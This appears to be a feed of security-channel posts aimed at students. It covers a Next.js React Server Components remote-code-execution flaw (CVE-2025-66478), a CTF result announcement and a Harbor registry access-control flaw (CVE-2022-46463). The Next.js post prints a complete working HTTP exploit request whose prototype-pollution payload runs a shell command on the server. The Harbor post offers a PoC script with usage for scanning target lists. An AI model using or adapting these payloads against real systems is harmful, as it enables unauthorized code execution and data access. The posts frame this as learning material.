SecList for CyberStudents
Think outside the box
React2Shell Ultimate - The most comprehensive CVE-2025-66478 Scanner for Next.js RSC RCE vulnerability. Multi-mode detection, WAF bypass, local scanning.

https://github.com/hackersatyamrastogi/react2shell-ultimate
POC:

POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 744

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('whoami',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
In the field of cybersecurity, it is essential to continuously study publicly available exploits or vulnerabilities discovered in certain technologies. You can learn how to use the latest emerging exploits through the "recent-threats" module available on TryHackMe at https://tryhackme.com/module/recent-threats . I hope this will be useful for you!

#tryhackme #pentest #cybersecurity #CVE
Forwarded from Turan Security
🏆 12th place at the BlackHat MEA 2025 CTF competition!

☠️The team defending the honor of Turan Security and 🇺🇿Uzbekistan placed in the TOP 12 among 125 teams at one of the world's most prestigious cybersecurity competitions!

The BlackHat MEA event, held in Riyadh, Saudi Arabia, is a global venue where the strongest specialists, experts and the world's leading cybersecurity teams meet.

Among the TOP teams, our Team lead captured the flag in 3 high-difficulty tasks:
🚩Firstblood - web, first;
🚩Firstblood - forensics, first;
🚩Secondblood - web, second.

Our goal is to raise Uzbekistan's standing on the international stage, inspire young people, and contribute to the development of the cybersecurity field.
Forwarded from Private Shizo
CVE-2022-46463.zip
2.9 KB
💥PoC for CVE-2022-46463
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication.

Usage:
python3 cve-2022-46463.py -u TargetURL
python3 cve-2022-46463.py -f targetListUrlFile